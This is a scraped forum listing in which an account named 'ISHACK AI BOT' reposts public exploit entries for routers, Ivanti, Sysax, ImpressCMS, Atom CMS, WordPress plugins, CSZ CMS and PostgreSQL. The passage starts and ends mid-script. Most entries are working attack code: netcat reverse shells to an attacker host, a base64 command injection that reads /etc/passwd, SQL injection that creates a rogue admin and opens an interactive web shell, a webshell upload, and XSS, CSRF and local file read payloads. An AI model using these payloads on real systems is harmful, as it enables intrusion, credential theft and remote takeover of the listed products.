'{"tasks":[{"enable":true,"minutes":"*","hours":"*","days":"*","months":"*","weekdays":"*","command":"rm /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc ' + \ f'{lhost_ip} {lhost_port} ' + \ '>/tmp/f"}],"_board":{"name":"RL21","platform":"irz_mt02","time":"Wed Mar 16 16:43:20 UTC 2022"}}' payload_json = json.loads(payload_str) s = requests.Session() s.auth = (router_user, router_pass) s.headers.update( {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36"}) s.headers.update({"X-Requested-With": "XMLHttpRequest"}) s.headers.update({"Origin": router_url}) s.headers.update({"Referer": router_url}) s.post(router_url + "/api/crontab", json=payload_json) exploit_str = f'rm /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc {lhost_ip} 443 >/tmp/f' print( "Request sent! You may have to wait about 2 minutes to get a shell. \nFirst shell will die due to crontab job. Start a new listener on a new port [e.g. 443], and run the following command: " + exploit_str) print("To fix TTY: type telnet 0.0.0.0 in the shell") def exploit2(): print("## Running CSRF to RCE exploit") print() print() router_ip = input("## Enter the router ip to exploit: ") router_port = int( input("## Enter the victim router web page port (default is 80): ") or "80") LHOST = input("## Enter the LHOST for the router reverse shell: ") LPORT = input("## Enter the LPORT for the router reverse shell: ") load_csrf_poc_file(router_ip, router_port, LHOST, LPORT) def load_csrf_poc_file(router_ip, router_port, lhost_ip, lhost_port): file_path = os.path.dirname(__file__) + os.sep + "poc.template.html" if os.path.isfile(file_path): with open(file_path) as poc_file: original_poc_data_str = poc_file.read() new_html = original_poc_data_str.replace("{router_ip}", router_ip) new_html = new_html.replace( "{router_port}", str(router_port)) lhost_split_arr = lhost_ip.split(".") if len(lhost_split_arr) == 4: new_html = new_html.replace( "{lhost_ip_octect_1}", lhost_split_arr[0]) new_html = new_html.replace( "{lhost_ip_octect_2}", lhost_split_arr[1]) new_html = new_html.replace( "{lhost_ip_octect_3}", lhost_split_arr[2]) new_html = new_html.replace( "{lhost_ip_octect_4}", lhost_split_arr[3]) new_html = new_html.replace( "{lhost_port}", lhost_port) new_file_path = os.path.dirname( __file__) + os.sep + "poc.new.html" try: with open(new_file_path, 'w') as new_file: new_file.write(new_html) print() print( f'New file written to {new_file_path}. Host this file') except FileNotFoundError: print("You had an error writing to the file, doesn't exist.") else: print(f'{lhost_ip} is not a proper IPV4 address.') else: print(f'{file_path} not found') main()
  8. ISHACK AI BOT

    Ivanti Endpoint Manager 4.6 - Remote Code Execution (RCE)

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: Ivanti Endpoint Manager 4.6 - Remote Code Execution (RCE) # Date: 20/03/2022 # Exploit Author: d7x # Vendor Homepage: https://www.ivanti.com/ # Software Link: https://forums.ivanti.com/s/article/Customer-Update-Cloud-Service-Appliance-4-6 # Version: CSA 4.6 4.5 - EOF Aug 2021 # Tested on: Linux x86_64 # CVE : CVE-2021-44529 ### This is the RCE exploit for the following advisory (officially discovered by Jakub Kramarz): https://forums.ivanti.com/s/article/SA-2021-12-02?language=en_US Shoutouts to phyr3wall for providing a hint to where the obfuscated code relies @d7x_real https://d7x.promiselabs.net https://www.promiselabs.net ### # cat /etc/passwd curl -i -s -k -X $'GET' -b $'e=ab; exec=c3lzdGVtKCJjYXQgL2V0Yy9wYXNzd2QiKTs=; pwn=; LDCSASESSID=' 'https://.../client/index.php' | tr -d "\n" | grep -zPo '<c123>\K.*?(?=</c123>)'; echo # sleep for 10 seconds curl -i -s -k -X $'GET' -b $'e=ab; exec=c2xlZXAoMTApOw==; pwn=; LDCSASESSID=' 'https://.../client/index.php' | tr -d "\n" | grep -zPo '<c123>\K.*?(?=</c123>)'; echo
  9. ISHACK AI BOT

    Sysax FTP Automation 6.9.0 - Privilege Escalation

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Author: bzyo (@bzyo_) # Exploit Title: Sysax FTP Automation 6.9.0 - Privilege Escalation # Date: 03-20-2022 # Vulnerable Software: Sysax FTP Automation 6.9.0 # Vendor Homepage: https://www.sysax.com/ # Version: 6.9.0 # Software Link: https://www.sysax.com/download/sysaxauto_setup.msi # Tested on: Windows 10 x64 # Details: Sysax Scheduler Service runs as Local System. By default the application allows for low privilege users to create/run backup jobs other than themselves. By removing the option to run as current user or another, the task will run as System. A low privilege user could abuse this and escalate their privileges to local system. # Prerequisites: To successfully exploit this vulnerability, an attacker must already have local access to a system running Sysax FTP Automation using a low privileged user account # Exploit: Logged in as low privileged account 1. Create folder c:\temp 2. Download netcat (nc.exe) to c:\temp 3. Create file 'pwn.bat' in c:\temp with contents c:\temp\nc.exe localhost 1337 -e cmd 4. Open command prompt and netcat listener nc -nlvvp 1337 5. Open sysaxschedscp.exe from C:\Program Files (x86)\SysaxAutomation 6. Select Setup Scheduled/Triggered Tasks - Add task (Triggered) - Update folder to monitor to be c:\temp - Check 'Run task if a file is added to the monitor folder or subfolder(s)' - Choose 'Run any other Program' and choose c:\temp\pwn.bat - Uncheck 'Login as the following user to run task' - Finish and Save 7. Create new text file in c:\temp 8. Check netcat listener C:\WINDOWS\system32>whoami whoami nt authority\system
  10. ISHACK AI BOT

    ICT Protege GX/WX 2.08 - Stored Cross-Site Scripting (XSS)

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: ICT Protege GX/WX 2.08 - Stored Cross-Site Scripting (XSS) # Exploit Author: LiquidWorm Vendor: Integrated Control Technology Ltd. Product web page: https://www.ict.co Affected version: GX: Ver: 2.08.1002 K1B3 Lib: 04.00.217 Int: 2.3.235.J013 OS: 2.0.20 WX: Ver: 4.00 284 H062 App: 02.08.766 Lib: 04.00.169 Int: 02.2.208 Summary: Protege GX is an enterprise level integrated access control, intrusion detection and building automation solution with a feature set that is easy to operate, simple to integrate and effortless to extend. Protege WX is an all-in-one, web-based, cross-platform system that gives you a fully functional access control and intrusion detection solution in a fraction of the time of conventional software. With no software to install, setup is quick and simple. Connect the Controller and system components, then open a web browser to launch the intuitive wizard-driven interface which guides you through the process of configuring your system. Desc: The application suffers from an authenticated stored XSS vulnerability. The issue is triggered when input passed to the 'Name' parameter is not properly sanitized before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site. Tested on: Microsoft-WinCE/6.00 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2022-5699 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5699.php 08.02.2022 -- UI navigation: -------------- Scheduling > Daylight Savings > (Name field). Decrypted POST request: ----------------------- POST /daylightsaving.htm Command&Type=Submit&SubType=GXT_DAYLIGHTSAVINGS_TBL&DaylightSavingId=1&action=update&Name=ZSL%22%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E&StartMonth=10&EndMonth=2&StartDay=41&EndDay=41&RecId=1 Encrypted GET request: ---------------------- http://CONTROLLER_IP/PRT_CTRL_DIN_ISAPI.dll?8F7FFABE947FEE9C78850F2BA679A3B1645F6378696B32385B56303C43604B48F8CD082303AADCFCECEA082384C860AB16159DADCD89C9A7A2A47EE1F49A7A98AC9A8572882F88FAE5409CF6E06E04DA7F7D10AA6D45525C62B2A62FD949FF00E6B6B7471010908D9A59FBA1D9F304AD8CB24E0CE317A0870AA5A5253F0FCD58CA2BC874AC002CB62422E184FB9F13161C9C00E08F258B8519578EA2793A0C28A4AF51CF65637C0C2F972CE3F49703214A63AA78B3EBE5C720DBE1E9C97E772334EC95480956E27DB6D1DF4489C5D60CCE27D69B388CA6C69A9DC72D85127F870DDA4E459CA245508EBFD66D1C83D9FA12838C1F426E538D5D75192B57DF5AF6 Additional info: ---------------- Databse backup predictable name: Db_D3037E8A_8_Feb_22.bak The D3037E8A is the serial number of the onboard reader. Encrypt/Decrypt functions: -------------------------- From console: > localStorage.getItem("WXKey") < '8EDB22D9FB767538' function encryptAES(a, c) { a = a.toString(); a = unescape(encodeURIComponent(a)); "undefined" == typeof c && (c = !0); if (0 == servertype) return a; var b = localStorage.getItem("WXKey"); if ("" == b || null == b) return a; for (var d = "", e = 0; 16 > e; e++) d += String.fromCharCode(Math.floor(75 * Math.random() + 48)); a = d + mcrypt.Encrypt(addPKCS7(a), d, b, "rijndael-128", "cbc"); return a = c ? getCookie("SESSID") + strToHex(a) : strToHex(a) } function decryptAES(a) { if (null == a) return ""; a = a.toString(); if ("<invalid session> < Packet not Init and not encrypted. >" == a) a = 0 == servertype ? "login.php" : "login.htm", window.location = a + "?" + Math.random().toString(16).substring(2, 8).toLowerCase(); else if ("<invalid session>" == a.substr(0, 17)) a = 0 == servertype ? "login.php?logout" : "login.htm?logout", window.location = a + "?" + Math.random().toString(16).substring(2, 8).toLowerCase(); else { if (0 == servertype) return a; var c = localStorage.getItem("WXKey"); if ("" == c) return a; a = hexToStr(a); var b = a.substr(0, 16); a = a.substr(16, a.length); a = mcrypt.Decrypt(a, b, c, "rijndael-128", "cbc").replace(/\x00+$/g, ""); a = removePKCS7(a); return a = decodeURIComponent(escape(a)) }
  11. ISHACK AI BOT

    ICT Protege GX/WX 2.08 - Client-Side SHA1 Password Hash Disclosure

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: ICT Protege GX/WX 2.08 - Client-Side SHA1 Password Hash Disclosure # Exploit Author: LiquidWorm Vendor: Integrated Control Technology Ltd. Product web page: https://www.ict.co Affected version: GX: Ver: 2.08.1002 K1B3 Lib: 04.00.217 Int: 2.3.235.J013 OS: 2.0.20 WX: Ver: 4.00 284 H062 App: 02.08.766 Lib: 04.00.169 Int: 02.2.208 Summary: Protege GX is an enterprise level integrated access control, intrusion detection and building automation solution with a feature set that is easy to operate, simple to integrate and effortless to extend. Protege WX is an all-in-one, web-based, cross-platform system that gives you a fully functional access control and intrusion detection solution in a fraction of the time of conventional software. With no software to install, setup is quick and simple. Connect the Controller and system components, then open a web browser to launch the intuitive wizard-driven interface which guides you through the process of configuring your system. Desc: The application is vulnerable to improper access control that allows an authenticated operator to disclose SHA1 password hashes (client-side) of other users/operators. Tested on: Microsoft-WinCE/6.00 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2022-5700 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5700.php 08.02.2022 -- Navigate to http://CONTROLLER_IP/operator.htm Source: <p><label id="OperatorPassword">Password</label><input type="password" id="Password" value="" class="narrow" readonly=""> <input type="button" id="ButtonChangeOperatorPassword" class="narrow" style="float: right; margin-right: 23%; width: auto;" onclick="updatePassword('operator');" data-multiselect="disabled" value="Change Password"></p> ... ... <input type="hidden" id="pswdsha" value="053e98c13fcbd7df3bf3a220088e19c867dfd4cc"> ...
  12. ISHACK AI BOT

    ProtonVPN 1.26.0 - Unquoted Service Path

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: ProtonVPN 1.26.0 - Unquoted Service Path # Date: 22/03/2022 # Exploit Author: gemreda (@gemredax) # Vendor Homepage: https://protonvpn.com/ # Software Link: https://protonvpn.com/ # Version: 1.26.0 # Tested: Windows 10 x64 # Contact: [email protected] PS C:\Users\Emre> sc.exe qc "ProtonVPN Wireguard" [SC] QueryServiceConfig SUCCESS SERVICE_NAME: ProtonVPN Wireguard TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 3 DEMAND_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\Proton Technologies\ProtonVPN\ProtonVPN.WireGuardService.exe C:\ProgramData\ProtonVPN\WireGuard\ProtonVPN.conf LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : ProtonVPN WireGuard DEPENDENCIES : Nsi : TcpIp SERVICE_START_NAME : LocalSystem #Exploit: The product uses a search path that contains an unquoted element, in which the element contains whitespace or other separators. This can cause the product to access resources in a parent path. If a malicious individual has access to the file system, it is possible to elevate privileges by inserting such a file as "C:\Program.exe" to be run by a privileged program making use of WinExec.
  13. ISHACK AI BOT

    WordPress Plugin amministrazione-aperta 3.7.3 - Local File Read - Unauthenticated

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: WordPress Plugin amministrazione-aperta 3.7.3 - Local File Read - Unauthenticated # Google Dork: inurl:/wp-content/plugins/amministrazione-aperta/ # Date: 23-03-2022 # Exploit Author: Hassan Khan Yusufzai - Splint3r7 # Vendor Homepage: https://wordpress.org/plugins/amministrazione-aperta/ # Version: 3.7.3 # Tested on: Firefox # Vulnerable File: dispatcher.php # Vulnerable Code: ``` if ( isset($_GET['open']) ) { include(ABSPATH . 'wp-content/plugins/'.$_GET['open']); } else { echo ' <div id="welcome-panel" class="welcome-panel" style="padding-bottom: 20px;"> <div class="welcome-panel-column-container">'; include_once( ABSPATH . WPINC . '/feed.php' ); ``` # Proof of Concept: localhost/wp-content/plugins/amministrazione-aperta/wpgov/dispatcher.php?open=[LFI]
  14. ISHACK AI BOT

    ImpressCMS 1.4.2 - Remote Code Execution (RCE)

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: ImpressCMS 1.4.2 - Remote Code Execution (RCE) # Exploit Author: Egidio Romano aka EgiX # Date: 30/03/2022 # Version: <= 1.4.2 # Venor: https://www.impresscms.org # CVE: CVE-2021-26599 <?php /* ---------------------------------------------------------- ImpressCMS <= 1.4.2 SQL Injection to Remote Code Execution ---------------------------------------------------------- author..............: Egidio Romano aka EgiX mail................: n0b0d13s[at]gmail[dot]com software link.......: https://www.impresscms.org +-------------------------------------------------------------------------+ | This proof of concept code was written for educational purpose only. | | Use it at your own risk. Author will be not responsible for any damage. | +-------------------------------------------------------------------------+ [-] Vulnerability Description: User input passed through the "groups" POST parameter to the /include/findusers.php script is not properly sanitized before being passed to the icms_member_Handler::getUserCountByGroupLink() and icms_member_Handler::getUsersByGroupLink() methods. These methods use the first argument to construct a SQL query without proper validation, and this can be exploited by remote attackers to e.g. read sensitive data from the "users" database table through boolean-based SQL Injection attacks. The application uses PDO as a database driver, which allows for stacked SQL queries, as such this vulnerability could be exploited to e.g. create a new admin user and execute arbitrary PHP code. [-] CVE Reference: The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2021-26599 to this vulnerability. [-] Disclosure timeline: [19/01/2021] - Vendor notified through HackerOne [29/01/2021] - Vulnerability acknowledged by the vendor [03/02/2021] - CVE number assigned [06/02/2022] - Version 1.4.3 released, vulnerability not correctly fixed [11/02/2022] - Vendor was informed about the ineffective fix [09/03/2022] - Version 1.4.4 released [22/03/2022] - Public disclosure [-] Technical writeup: http://karmainsecurity.com/impresscms-from-unauthenticated-sqli-to-rce */ set_time_limit(0); error_reporting(E_ERROR); if (!extension_loaded("curl")) die("[-] cURL extension required!\n"); function hex_enc($input) { for ($i = 0; $i < strlen($input); $i++) $encoded .= sprintf("%02x", ord($input[$i])); return "0x{$encoded}"; } print "+-----------------------------------------------------------+\n"; print "| ImpressCMS <= 1.4.2 Remote Code Execution Exploit by EgiX |\n"; print "+-----------------------------------------------------------+\n"; if ($argc != 2) { print "\nUsage: php $argv[0] <URL>"; print "\nExample.: php $argv[0] http://localhost/impresscms/"; print "\nExample.: php $argv[0] https://www.impresscms.org/\n\n"; die(); } $url = $argv[1]; $ch = curl_init(); curl_setopt($ch, CURLOPT_HEADER, true); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); print "\n[+] Retrieving security token (CVE-2021-26598)\n"; curl_setopt($ch, CURLOPT_URL, "{$url}misc.php?action=showpopups&type=friend"); $res = curl_exec($ch); if (!preg_match("/(cookie: [^;]+); path/i", $res, $sid)) die("[-] Session coookie not found!\n"); if (!preg_match("/TOKEN_REQUEST' value='([^']+)'/", $res, $token)) die("[-] Token not found!\n"); print "[+] Starting SQL Injection attack (CVE-2021-26599)\n"; print "[*] Step 1: retrieving database name\n"; curl_setopt($ch, CURLOPT_URL, "{$url}include/findusers.php"); curl_setopt($ch, CURLOPT_HTTPHEADER, [$sid[1]]); $params = "user_submit=1&token={$token[1]}&groups[]=%s"; $min = true; $idx = 1; while(1) { $test = 256; for ($i = 7; $i >= 0; $i--) { $test = $min ? ($test - pow(2, $i)) : ($test + pow(2, $i)); $sql = "1) AND ORD(SUBSTR(DATABASE(),{$idx},1))<{$test}#"; curl_setopt($ch, CURLOPT_POSTFIELDS, sprintf($params, urlencode($sql))); $min = !preg_match("/No Users Found/", curl_exec($ch)); } if (($chr = $min ? ($test - 1) : ($test)) == 0) break; $dbname .= chr($chr); $min = true; $idx++; print "\r[+] DB name: {$dbname}"; } print "\n[*] Step 2: retrieving tables prefix\n"; $sub = "SELECT TRIM(TRAILING 'users' FROM table_name) FROM information_schema.tables WHERE table_schema='{$dbname}' AND table_name LIKE '%users'"; $min = true; $idx = 1; while(1) { $test = 256; for ($i = 7; $i >= 0; $i--) { $test = $min ? ($test - pow(2, $i)) : ($test + pow(2, $i)); $sql = hex_enc("SELECT IF(ORD(SUBSTR(({$sub}),{$idx},1))<{$test},1,SLEEP(1))"); $sql = "0); SET @q = {$sql}; PREPARE stmt FROM @q; EXECUTE stmt;#"; curl_setopt($ch, CURLOPT_POSTFIELDS, sprintf($params, urlencode($sql))); $start = time(); curl_exec($ch); $secs = time() - $start; $min = ($secs < 2); } if (($chr = $min ? ($test - 1) : ($test)) == 0) break; $prefix .= chr($chr); $min = true; $idx++; print "\r[+] Prefix: {$prefix}"; } print "\n[*] Step 3: creating new admin user\n"; $uid = time(); $enc = hex_enc("egix"); $pwd = hex_enc(md5("egix")); $sql = "0); INSERT INTO {$prefix}users (uid, uname, login_name, pass, level, enc_type) VALUES ({$uid}, {$enc}, {$enc}, {$pwd}, 5, 0)#"; curl_setopt($ch, CURLOPT_POSTFIELDS, sprintf($params, urlencode($sql))); curl_exec($ch); $sql = "0); INSERT INTO {$prefix}groups_users_link (groupid, uid) VALUES (1, {$uid})#"; curl_setopt($ch, CURLOPT_POSTFIELDS, sprintf($params, urlencode($sql))); curl_exec($ch); print "[+] Trying to login as the new user\n"; curl_setopt($ch, CURLOPT_URL, "{$url}user.php"); curl_setopt($ch, CURLOPT_POSTFIELDS, "uname=egix&pass=egix&op=login"); if (!preg_match("/(cookie: [^;]+); path/i", curl_exec($ch), $sid)) die("[-] Login failed!\n"); print "[+] Creating malicious autotask\n"; $phpcode = urlencode("if (isset(\$_SERVER[HTTP_CMD])) { print(____); passthru(base64_decode(\$_SERVER[HTTP_CMD])); die; }"); curl_setopt($ch, CURLOPT_URL, "{$url}modules/system/admin.php"); curl_setopt($ch, CURLOPT_HTTPHEADER, [$sid[1], "Referer: {$url}"]); curl_setopt($ch, CURLOPT_POSTFIELDS, "fct=autotasks&sat_name=rce&sat_code={$phpcode}&sat_enabled=1&op=addautotasks"); if (!preg_match("/HTTP.*302/i", curl_exec($ch))) die("[-] Something went wrong!\n"); print "[+] Launching shell\n"; curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_POST, false); while(1) { print "\nimpresscms-shell# "; if (($cmd = trim(fgets(STDIN))) == "exit") break; curl_setopt($ch, CURLOPT_HTTPHEADER, ["CMD: ".base64_encode($cmd)]); preg_match('/____(.*)/s', curl_exec($ch), $m) ? print $m[1] : die("\n[-] Exploit failed!\n"); }
  15. ISHACK AI BOT

    Atom CMS 2.0 - Remote Code Execution (RCE)

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: Atom CMS 2.0 - Remote Code Execution (RCE) # Date: 22.03.2022 # Exploit Author: Ashish Koli (Shikari) # Vendor Homepage: https://thedigitalcraft.com/ # Software Link: https://github.com/thedigicraft/Atom.CMS # Version: 2.0 # Tested on: Ubuntu 20.04.3 LTS # CVE: CVE-2022-25487 # Description This script uploads webshell.php to the Atom CMS. An application will store that file in the uploads directory with a unique number which allows us to access Webshell. # Usage : python3 exploit.py <IP> <Port> <atomcmspath> # Example: python3 exploit.py 127.0.0.1 80 /atom # POC Exploit: https://youtu.be/qQrq-eEpswc # Note: Crafted "Shell.txt" file is required for exploitation which is available on the below link: # https://github.com/shikari00007/Atom-CMS-2.0---File-Upload-Remote-Code-Execution-Un-Authenticated-POC ''' Description: A file upload functionality in Atom CMS 2.0 allows any non-privileged user to gain access to the host through the uploaded files, which may result in remote code execution. ''' #!/usr/bin/python3 ''' Import required modules: ''' import sys import requests import json import time import urllib.parse import struct import re import string import linecache proxies = { 'http': 'http://localhost:8080', 'https': 'https://localhost:8080', } ''' User Input: ''' target_ip = sys.argv[1] target_port = sys.argv[2] atomcmspath = sys.argv[3] ''' Get cookie ''' session = requests.Session() link = 'http://' + target_ip + ':' + target_port + atomcmspath + '/admin' response = session.get(link) cookies_session = session.cookies.get_dict() cookie = json.dumps(cookies_session) cookie = cookie.replace('"}','') cookie = cookie.replace('{"', '') cookie = cookie.replace('"', '') cookie = cookie.replace(" ", '') cookie = cookie.replace(":", '=') ''' Upload Webshell: ''' # Construct Header: header1 = { 'Host': target_ip, 'Accept': 'application/json', 'Cache-Control': 'no-cache', 'X-Requested-With': 'XMLHttpRequest', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36', 'Content-Type': 'multipart/form-data; boundary=----WebKitFormBoundaryH7Ak5WhirAIQ8o1L', 'Origin': 'http://' + target_ip, 'Referer': 'http://' + target_ip + ':' + target_port + atomcmspath + '/admin/index.php?page=users&id=1', 'Accept-Encoding': 'gzip, deflate', 'Accept-Language': 'en-US,en;q=0.9', 'Cookie': cookie, 'Connection': 'close', } # loading Webshell payload: path = 'shell.txt' fp = open(path,'rb') data= fp.read() # Uploading Webshell: link_upload = 'http://' + target_ip + ':' + target_port + atomcmspath + '/admin/uploads.php?id=1' upload = requests.post(link_upload, headers=header1, data=data) p=upload.text x = re.sub("\s", "\n", p) y = x.replace("1<br>Unknown", "null") z = re.sub('[^0-9]', '', y) ''' Finish: ''' print('Uploaded Webshell to: http://' + target_ip + ':' + target_port + atomcmspath + '/uploads/' + z + '.php') print('')
  16. ISHACK AI BOT

    Drupal avatar_uploader v7.x-1.0-beta8 - Cross Site Scripting (XSS)

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: Drupal avatar_uploader v7.x-1.0-beta8 - Cross Site Scripting (XSS) # Date: 2022-03-22 # Author: Milad karimi # Software Link: https://www.drupal.org/project/avatar_uploader # Version: v7.x-1.0-beta8 # Tested on: Windows 10 # CVE: N/A 1. Description: This plugin creates a avatar_uploader from any post types. The slider import search feature and tab parameter via plugin settings are vulnerable to reflected cross-site scripting. 2. Proof of Concept: http://$target/avatar_uploader.pages.inc?file=<script>alert("test")</script>
  17. ISHACK AI BOT

    WordPress Plugin Curtain 1.0.2 - Cross-site Request Forgery (CSRF)

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: WordPress Plugin Curtain 1.0.2 - Cross-site Request Forgery (CSRF) # Date: 24-03-2022 # Exploit Author: Hassan Khan Yusufzai - Splint3r7 # Vendor Homepage: https://wordpress.org/plugins/curtain/ # Version: 1.0.2 # Tested on: Firefox ## Summary: Cross site forgery vulnerability has been identified in curtain WordPress plugin that allows an attacker to to activate or deactivate sites maintenance mode. ## Vulnerable URL: http://localhost:10003/wp-admin/options-general.php?page=curtain&_wpnonce=&mode=0 ## CSRF POC Exploit ``` <html> <body> <form action="http://localhost:10003/wp-admin/options-general.php"> <input type="hidden" name="page" value="curtain" /> <input type="hidden" name="&#95;wpnonce" value="" /> <input type="hidden" name="mode" value="0" /> <input type="submit" value="Submit request" /> </form> </body> </html> ```
  18. ISHACK AI BOT

    WordPress Plugin admin-word-count-column 2.2 - Local File Read

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: WordPress Plugin admin-word-count-column 2.2 - Local File Read # Google Dork: inurl:/wp-content/plugins/admin-word-count-column/ # Date: 27-03-2022 # Exploit Author: Hassan Khan Yusufzai - Splint3r7 # Vendor Homepage: https://wordpress.org/plugins/admin-word-count-column/ # Version: 2.2 # Contact me: h [at] spidersilk.com # PHP version: 5.3.2 or below # Vulnerable File: plugins/admin-word-count-column/download-csv.php # Vulnerable Code: ``` <?php date_default_timezone_set('America/Los_Angeles'); $csvdate = date('Md-H-i-s-T'); $csvname = 'wordcounts-' . $csvdate . '.csv'; header('Content-Type: application/csv'); header('Content-Disposition: attachment; filename=' . $csvname); header('Pragma: no-cache'); readfile($_GET['path'] . 'cpwc.csv'); ?> ``` # Proof of Concept: localhost/wp-content/plugins/admin-word-count-column/download-csv.php?path=../../../../../../../../../../../../etc/passwd\0 Note: Null byte injection will only working in php 5.3.2 and below 5.3.2.
  19. ISHACK AI BOT

    WordPress Plugin cab-fare-calculator 1.0.3 - Local File Inclusion

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: WordPress Plugin cab-fare-calculator 1.0.3 - Local File Inclusion # Google Dork: inurl:/wp-content/plugins/cab-fare-calculator/ # Date: 24-03-2022 # Exploit Author: Hassan Khan Yusufzai - Splint3r7 # Vendor Homepage: https://wordpress.org/plugins/cab-fare-calculator/ # Version: 1.0.3 # Tested on: Firefox # Vulnerable File: tblight.php # Impact: Local File Read / Code Execution # Vulnerable Code: ``` if(!empty($_GET['controller']) && !empty($_GET['action']) && !empty($_GET['ajax']) && $_GET['ajax'] == 1) { require_once('' . 'controllers/'.$_GET['controller'].'.php'); } ``` # Proof of concept: http://localhost:10003/wp-content/plugins/cab-fare-calculator/tblight.php?controller=../../../../../../../../../../../etc/index&action=1&ajax=1 # POC Code Execution: /etc/index.php: <?php echo "Local file read"; phpinfo(); ?>
  20. ISHACK AI BOT

    WordPress Plugin video-synchro-pdf 1.7.4 - Local File Inclusion

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: WordPress Plugin video-synchro-pdf 1.7.4 - Local File Inclusion # Google Dork: inurl:/wp-content/plugins/video-synchro-pdf/ # Date: 26-03-2022 # Exploit Author: Hassan Khan Yusufzai - Splint3r7 # Vendor Homepage: https://wordpress.org/plugins/video-synchro-pdf/ # Version: 1.7.4 # Tested on: Firefox # Vulnerable File: video-synchro-pdf/reglages/Menu_Plugins/tout.php # Vulnerable Code: ``` <?php if ($_GET['p']<=NULL) { include(REPERTOIRE_VIDEOSYNCPDF.'reglages/Menu_Plugins/index.php'); }else{ include(REPERTOIRE_VIDEOSYNCPDF.'reglages/Menu_Plugins/'.$_GET['p'].'.php'); } ``` # Proof of Concept: http://localhost/wp-content/plugins/video-synchro-pdf/reglages/Menu_Plugins/tout.php?p= <http://localhost/wp-content/plugins/video-synchro-pdf/reglages/Menu_Plugins/tout.php?p=../../../../../../../../../../../../../etc/index>[LFI] Contents of index.php: <?php echo "Local file read"; phpinfo(); ?>
  21. ISHACK AI BOT

    CSZ CMS 1.2.9 - 'Multiple' Blind SQLi(Authenticated)

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: CSZ CMS 1.2.9 - 'Multiple' Blind SQLi(Authenticated) # Date: 2021-04-14 # Exploit Author: Rahad Chowdhury # Vendor Homepage: https://www.cszcms.com/ # Software Link: https://sourceforge.net/projects/cszcms/files/install/CSZCMS-V1.2.9.zip # Version: 1.2.9 # Tested on: Windows 10, Kali Linux, PHP 7.4.16, Apache 2.4.46 # CVE: CVE-2021-43701 *Steps to Reproduce:* 1. First login to your Admin Panel 2. then go to "General Menu > CSV Export / Import". 3. open burp site and configure with browser. 4. then select any "Table Name" > Select "Fields Select" and Select "Sort by" 5. Now click "Export to CSV" and intercept with burp suite 6. "fieldS[]" or "orderby" parameter is vulnerable. Let's try to inject Blind SQL Injection using this query "(select(0)from(select(sleep(10)))a)" in "orderby" parameter. *Proof of Concept:* http://127.0.0.1/CSZCMS/admin/export/getcsv/article_db?fieldS%5B%5D=article_db_id&orderby=(select(0)from(select(sleep(10)))a)&sort=ASC&submit=Export+to+CSV *Output:* By issuing sleep(0) response will be delayed to 0 seconds. By issuing sleep(1) response will be delayed to 1 seconds. By issuing sleep(5) response will be delayed to 5 seconds. By issuing sleep(10) response will be delayed to 10 seconds
  22. ISHACK AI BOT

    PostgreSQL 9.3-11.7 - Remote Code Execution (RCE) (Authenticated)

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: PostgreSQL 9.3-11.7 - Remote Code Execution (RCE) (Authenticated) # Date: 2022-03-29 # Exploit Author: b4keSn4ke # Github: https://github.com/b4keSn4ke # Vendor Homepage: https://www.postgresql.org/ # Software Link: https://www.postgresql.org/download/linux/debian/ # Version: 9.3 - 11.7 # Tested on: Linux x86-64 - Debian 4.19 # CVE: CVE-2019–9193 #!/usr/bin/python3 import psycopg2 import argparse import hashlib import time def parseArgs(): parser = argparse.ArgumentParser(description='CVE-2019–9193 - PostgreSQL 9.3-11.7 Authenticated Remote Code Execution') parser.add_argument('-i', '--ip', nargs='?', type=str, default='127.0.0.1', help='The IP address of the PostgreSQL DB [Default: 127.0.0.1]') parser.add_argument('-p', '--port', nargs='?', type=int, default=5432, help='The port of the PostgreSQL DB [Default: 5432]') parser.add_argument('-d', '--database', nargs='?', default='template1', help='Name of the PostgreSQL DB [Default: template1]') parser.add_argument('-c', '--command', nargs='?', help='System command to run') parser.add_argument('-t', '--timeout', nargs='?', type=int, default=10, help='Connection timeout in seconds [Default: 10 (seconds)]') parser.add_argument('-U', '--user', nargs='?', 